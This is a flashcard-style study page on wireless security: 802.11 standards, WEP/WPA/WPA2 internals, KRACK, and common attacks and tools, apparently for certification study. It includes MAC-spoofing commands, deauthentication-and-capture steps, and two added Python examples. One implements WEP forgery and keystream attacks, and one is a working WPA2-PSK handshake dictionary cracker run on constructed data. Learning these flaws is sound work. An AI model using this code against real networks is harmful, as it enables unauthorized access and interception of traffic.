Wireless Network Hacking Flashcards
802.11 series of wireless standards
- 11a 54 Mbps, 5 GHz, OFDM modulation
- 11b 11 Mbps, 2.4 GHz, DSSS modulation
- 11d regulatory-domain (country) extensions to a and b for international operation
- 11e Quality of Service
- 11g 54 Mbps, 2.4 GHz, OFDM and DSSS modulation (backward compatible with 11b)
- 11i security amendment: the basis of WPA/WPA2 (RSN)
- 11n 100+ Mbps, 2.4 and 5 GHz, OFDM modulation with MIMO
- 11ac 1000+ Mbps, 5 GHz, OFDM with 256-QAM modulation
Other wireless standards
- 15.1 Bluetooth
- 15.4 Zigbee - low power, low data rate, close proximity ad hoc network (Zigbee is built on the 802.15.4 radio layer)
- 16 WiMAX - 40 Mbps, wireless metropolitan area network
Orthogonal Frequency Division Multiplexing (OFDM)
The transmission medium is divided into many closely spaced sub-carriers that are orthogonal to each other (they overlap in frequency but do not interfere), and each sub-carrier carries a separate low-rate signal.
Direct Sequence Spread Spectrum (DSSS)
A transmission technology used in wireless LANs. The data signal at the sending station is combined with a higher-rate pseudo-random chip sequence (the spreading code), which spreads each user bit over several chips according to the spreading ratio. The benefits of DSSS are resistance to jamming and narrowband interference, sharing a single channel among multiple users, lower effective background noise, and recovery of relative timing (synchronization) between transmitter and receiver from the chip sequence.
Wireless - Ad-hoc mode
Systems communicate directly with each other (an independent BSS) without an access point, such as two computers.
Wireless - Infrastructure mode
Makes use of a wireless access point (WAP). Clients need to associate with a WAP and disassociate to connect to a different WAP. With a single WAP you have a basic service area (BSA). Communication between this single WAP and its clients is known as a basic service set. If you have multiple WAPs, then you have an extended service set (ESS). Roaming involves clients disassociating from one WAP and associating with another WAP within the ESS.
Basic Service Set Identifier (BSSID)
The MAC address of the wireless access point at the center of the basic service set (BSS).
Wireless omnidirectional antennae
Signal emanates from the source in 360 degrees. Dipole antennas are omnidirectional.
Unidirectional antennae
Focuses the signal in a specific direction, which greatly increases effective signal strength and range. Yagi antennas are unidirectional. Parabolic grid antennas are unidirectional and work like a satellite dish. Loop antennas are also unidirectional.
Cantennae
Home-made directional antenna built from a metal can (classically a Pringles can).
Service Set Identifier (SSID)
A case-sensitive text string of up to 32 bytes that identifies a wireless network. SSIDs are broadcast in beacons by default but can be hidden by choosing not to broadcast them (SSID cloaking). A cloaked SSID still appears in probe and association frames, so sniffing a client as it connects reveals it.
Open Systems Authentication
The WAP performs no authentication of the client; any client that requests authentication is accepted.
Shared Key Authentication
The wireless client participates in a challenge/response with the AP: the AP sends a 128-byte challenge, the client returns it encrypted with the WEP key, and the AP decrypts it and compares. Because both the challenge and its encrypted response are sent in the clear, a sniffer can XOR them to recover RC4 keystream and then pass authentication without knowing the key.
War Chalking
Drawing symbols in public areas to indicate the location and type of WAPs.
)( indicates an open node; () (a closed circle) indicates a closed node
$ indicates pay for access
(W) indicates a WEP-enabled node
Wired Equivalent Privacy (WEP)
- Key sizes: 40-232 bit. The 64 bit version uses a 40 bit key, the 128 bit version a 104 bit key, the 256 bit version a 232 bit key (the advertised size adds the 24 bit IV to the key)
- Cipher: RC4, seeded with IV || key. The 24 bit initialization vector is sent in the clear in front of each frame
- Integrity: a 32 bit integrity check value (ICV), which is just CRC-32 of the plaintext, encrypted together with it
- Easy to crack: with only 2^24 IVs keystreams repeat, RC4 has weak IVs (FMS attack), and the PTW attack needs only tens of thousands of captured IVs to recover the key. Because CRC-32 is linear, frames can also be modified without the key
- Attackers force deauthentication/disassociation of clients (and replay captured ARP requests) to generate the number of packets needed to analyze for cracking the WEP key
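The WEP weaknesses listed above, and the shared key authentication weakness from the earlier card, worked through in Python as an added example (this is not code from the original page). It implements WEP as the card describes it, RC4 seeded with IV || key and a CRC-32 ICV, on constructed keys, IVs, plaintexts and challenges, and shows that a repeated IV leaks plaintext, that CRC-32 linearity lets an attacker alter a frame and fix its ICV with no key, and that a sniffed shared-key exchange yields keystream that passes a later authentication. It does not implement the statistical (FMS/PTW) key-recovery attacks that aircrack-ng uses; those need many captured IVs.

```python
"""WEP weaknesses on constructed data. Added example, not code from the original page.

Implements WEP as the card describes it (RC4 seeded with 24-bit IV || root key, CRC-32
ICV appended before encryption) and shows: (1) a reused IV leaks the XOR of two
plaintexts, (2) CRC-32 is linear, so a frame can be altered and its ICV fixed without
the key, (3) shared-key authentication leaks keystream that answers later challenges.
"""
import struct
import zlib

KEY = bytes.fromhex("0102030405")   # constructed 40-bit root key (the "64-bit" WEP)
IV = bytes.fromhex("000001")        # constructed IV, reused below by two frames
P1 = b"GET /index.html HTTP/1.0"    # constructed plaintexts of equal length
P2 = b"POST /login.php HTTP/1.0"

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)

def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (clear) || RC4_{IV||key}(plaintext || ICV)."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + root_key, len(data)))

def wep_decrypt(root_key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + root_key, len(body)))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext, tag == icv(plaintext)

def iv_reuse_recover(frame_a: bytes, frame_b: bytes, known_plain_a: bytes) -> bytes:
    """Same IV on both frames => C_a xor C_b = P_a xor P_b, so knowing (or guessing)
    P_a yields P_b with no key at all."""
    assert frame_a[:3] == frame_b[:3], "attack needs a repeated IV"
    n = len(known_plain_a)
    return xor(xor(frame_a[3:3 + n], frame_b[3:3 + n]), known_plain_a)

def forge_without_key(frame: bytes, delta: bytes) -> bytes:
    """XOR `delta` into the plaintext of an encrypted frame and patch the encrypted ICV.
    CRC-32 is affine: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(0^len), so the correction
    depends only on D, never on P or the key (Borisov/Goldberg/Wagner, 2001)."""
    iv, body = frame[:3], frame[3:]
    assert len(delta) == len(body) - 4
    fix = zlib.crc32(delta) ^ zlib.crc32(b"\x00" * len(delta))
    return iv + xor(body[:-4], delta) + xor(body[-4:], struct.pack("<I", fix & 0xFFFFFFFF))

def shared_key_forge(challenge_seen: bytes, response_seen: bytes, new_challenge: bytes) -> bytes:
    """Shared-key auth: the AP's challenge and the client's encrypted reply both travel in
    the clear. XORing them gives RC4 keystream for that IV, which answers any later
    challenge of the same length without knowing the WEP key."""
    iv, body = response_seen[:3], response_seen[3:]
    keystream = xor(body, challenge_seen + icv(challenge_seen))
    return iv + xor(new_challenge + icv(new_challenge), keystream)

def demo_iv_reuse() -> bytes:
    f1 = wep_encrypt(KEY, IV, P1)
    f2 = wep_encrypt(KEY, IV, P2)
    return iv_reuse_recover(f1, f2, P1)          # attacker who guesses P1 reads P2

def demo_forge():
    frame = wep_encrypt(KEY, bytes.fromhex("0a0b0c"), b"amount=0010")
    delta = bytearray(len(b"amount=0010"))
    delta[7] = ord("0") ^ ord("9")               # turn "0010" into "9010" inside the ciphertext
    return wep_decrypt(KEY, forge_without_key(frame, bytes(delta)))   # ICV still verifies

def demo_shared_key():
    c1, c2 = bytes(range(128)), bytes(range(128, 0, -1))   # constructed 128-byte challenges
    legit = wep_encrypt(KEY, bytes.fromhex("111111"), c1)   # sniffed legitimate exchange
    forged = shared_key_forge(c1, legit, c2)                # impostor answers a new challenge
    return wep_decrypt(KEY, forged)                         # AP decrypts it and accepts
```

Each demo_* function returns the recovered plaintext or the (plaintext, ICV-valid) pair the AP would see, so the effect of each weakness can be checked directly rather than read off a print statement.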
Wi-Fi Protected Access (WPA)
WPA uses the Temporal Key Integrity Protocol (TKIP) on top of RC4: a 128 bit temporal key is mixed with the transmitter's MAC address and a 48 bit packet sequence counter to produce a fresh per-packet RC4 key, and the Michael message integrity code is added on top of the CRC-32. WPA also re-keys periodically (commonly cited as every 10,000 packets). The pairwise keys are not exchanged by EAP itself: EAP/802.1X (or the pre-shared key) produces the Pairwise Master Key (PMK), and the EAPOL four-way handshake derives the per-session keys from it.
WPA2
Similar to WPA, but replaces TKIP/RC4 with AES-CCMP
WPA2 Personal - uses a preshared key (PSK) derived from the passphrase and the SSID
WPA2 Enterprise - uses 802.1X/EAP with a RADIUS server for authentication
Uses AES for encryption, which allows FIPS 140-2 compliance
Uses CCMP (Counter Mode with CBC-MAC Protocol): AES in counter mode for confidentiality and a cipher block chaining message authentication code (CBC-MAC) for integrity. CCMP calls the resulting tag a message integrity code (MIC)
Wireless Security Standards
Standard  Cipher       IV           Key          Integrity
WEP       RC4          24 bit       40-232 bit   CRC-32 (ICV)
WPA       RC4 + TKIP   48 bit       128 bit      Michael MIC + CRC-32
WPA2      AES-CCMP     48 bit (PN)  128 bit      CBC-MAC (CCMP MIC)
Wireless Threats
- Access Control attacks
- Integrity attacks
- Confidentiality attacks
- Availability attacks
- Authentication attacks
Locate wireless networks
WIGLE, NetStumbler, WifiExplorer, WiFiFoFum, OpenSignalMaps, Wifinder, Kismet, NetSurveyor, WeFi, Skyhook. Kismet works passively by channel hopping; it can sniff packets and save them to a capture file for viewing in Wireshark or tcpdump.
AirPCap
USB wireless capture adapter used for wireless hacking (capture and injection). Works with Aircrack-ng and AirPcapReplay.
Wireless Attacks
Rogue Access Point
Evil Twin - a rogue AP configured with the same SSID as a legitimate WAP so that clients connect to it instead; also known as a mis-association attack. Faking a well-known public AP (free hotspot) is referred to as a honeyspot attack.
Ad-hoc connection attack - get a client into a direct peer-to-peer (ad-hoc) connection with the attacker, bypassing the WAP and its security.
Jamming - flood the channel with RF noise so that no station can transmit (denial of service).
MAC spoofing - bypasses a MAC filter on a WAP: sniff the MAC address of an already-authorized client, then clone it. Easily done on a Linux machine (the interface must be down while the address is changed):
1. ifconfig wlan0 down
2. ifconfig wlan0 hw ether AA:BB:CC:DD:EE:FF
3. ifconfig wlan0 up
Wireless Encryption Attack
- Start a WiFi adapter in monitor mode and ensure it can both sniff and inject packets
- Start a sniffer on the target channel, capturing to a file
- Use de-auth to force clients to reconnect, generating thousands of wireless packets (for WEP: IVs; for WPA/WPA2: a fresh four-way handshake)
- Analyze the captured packets to recover the key
Aircrack-ng recovers WEP keys statistically from captured IVs and cracks WPA/WPA2-PSK by a dictionary attack against a captured four-way handshake (a pure brute force of the handshake is impractical because each guess costs a PBKDF2 derivation).
Cain and Abel can sniff wireless packets and crack keys as well; KisMAC (for Mac OS) can brute force WEP or WPA passwords.
Other cracking tools: WEPAttack, WEPCrack, Portable Penetrator, Elcomsoft's Wireless Security Auditor.
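The "analyze the packets" step for WPA/WPA2-PSK, and the four-way handshake key derivation from the WPA and WPA2 cards, worked through in Python as an added example (not code from the original page or from aircrack-ng). The derivations follow IEEE 802.11i: PMK from PBKDF2-HMAC-SHA1 over the passphrase and SSID, PTK from PRF-512 over the two MAC addresses and nonces, and the EAPOL-Key MIC as HMAC-SHA1 truncated to 128 bits for WPA2/CCMP. The AP and client MAC addresses, the nonces, the wordlist and the EAPOL message 2 frame are constructed here, not captured; the SSID "IEEE" with passphrase "password" is the PMK test vector from the 802.11i annex.

```python
"""WPA/WPA2-PSK key derivation and the handshake dictionary attack.

Added example, not code from the original page. Derivations follow IEEE 802.11i:
  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)|max(AA,SPA)|min(nonces)|max(nonces))
  KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]
  MIC(EAPOL-Key msg 2, WPA2/CCMP) = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]
MAC addresses, nonces and the EAPOL frame below are constructed, not captured.
"""
import hashlib
import hmac
import struct

PBKDF2_ITERATIONS = 4096
MIC_OFFSET = 81   # 802.1X hdr(4)+desc(1)+info(2)+len(2)+replay(8)+nonce(32)+iv(16)+rsc(8)+id(8)

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK: the slow step that makes every dictionary guess cost 4096 HMACs."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ITERATIONS, 32)

def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: concatenated HMAC-SHA1(PMK, label | 0x00 | data | counter)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b"".join(hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))   # 4 * 20 bytes >= 64 bytes
    return out[:64]

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits.
    (WPA/TKIP, descriptor version 1, uses HMAC-MD5 instead.)"""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_eapol_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct four-way-handshake message 2 (supplicant -> AP) with a valid MIC. This
    stands in for the frame a sniffer captures; the attacker never needs the KCK to use
    the frame, only to verify guesses against its MIC."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/CCMP/PSK
    body = (b"\x02"                                  # descriptor type: RSN key descriptor
            + struct.pack(">H", 0x010a)              # key info: MIC set, pairwise, version 2
            + struct.pack(">H", 0)                   # key length (0 in message 2)
            + struct.pack(">Q", 1)                   # replay counter
            + snonce                                 # key nonce = SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
            + b"\x00" * 16                           # MIC placeholder
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    eapol = b"\x02\x03" + struct.pack(">H", len(body)) + body   # 802.1X v2, type EAPOL-Key
    return eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]

def crack_psk(candidates, ssid: str, aa: bytes, spa: bytes,
              anonce: bytes, snonce: bytes, eapol_msg2: bytes):
    """Dictionary attack: recompute PMK -> PTK -> KCK per guess and compare the EAPOL MIC.
    Returns the passphrase that reproduces the captured MIC, or None."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in candidates:
        kck = derive_ptk(pmk_from_passphrase(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return guess
    return None

# Constructed handshake parameters (not a real capture).
SSID = "IEEE"                          # with passphrase "password": the 802.11i Annex H PMK test vector
AA = bytes.fromhex("001122334455")     # AP (authenticator) MAC, constructed
SPA = bytes.fromhex("66778899aabb")    # client (supplicant) MAC, constructed
ANONCE = bytes(range(32))              # constructed nonces
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "password"
CAPTURED_MSG2 = build_eapol_msg2(
    SNONCE, derive_ptk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16])

def demo_crack(wordlist=("letmein", "Password1", "password", "wireless")):
    """Run the dictionary attack against the constructed capture."""
    return crack_psk(wordlist, SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2)

if __name__ == "__main__":
    print("PMK:", pmk_from_passphrase(TRUE_PASSPHRASE, SSID).hex())
    print("recovered passphrase:", demo_crack())
```

Everything an attacker needs (both MAC addresses, both nonces, the SSID and message 2 with its MIC) is visible in the clear in a single captured handshake, which is why one forced deauthentication is enough and why the only real defence is a passphrase that is not in any wordlist.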
Key Re-installation Attack (KRACK)
A key reinstallation attack against the WPA2 four-way handshake (and the group-key handshake). Acting as a man-in-the-middle on the channel, the attacker blocks message 4 so the AP retransmits message 3; replaying message 3 makes the client reinstall the key it is already using, which resets the packet number (nonce) and replay counter. Reusing a nonce with AES-CCMP/GCMP lets the attacker decrypt and replay frames (and with TKIP or GCMP forge them). KRACK does not recover the passphrase or PMK; some wpa_supplicant versions (2.4 and 2.5, used by Android 6) instead installed an all-zero key, which is worse. The fix is for clients to refuse to reinstall an already-installed key.
Wireless Sniffing tools
NetStumbler, Kismet, OmniPeek, AirMagnet WiFi Analyzer Pro, WiFi Pilot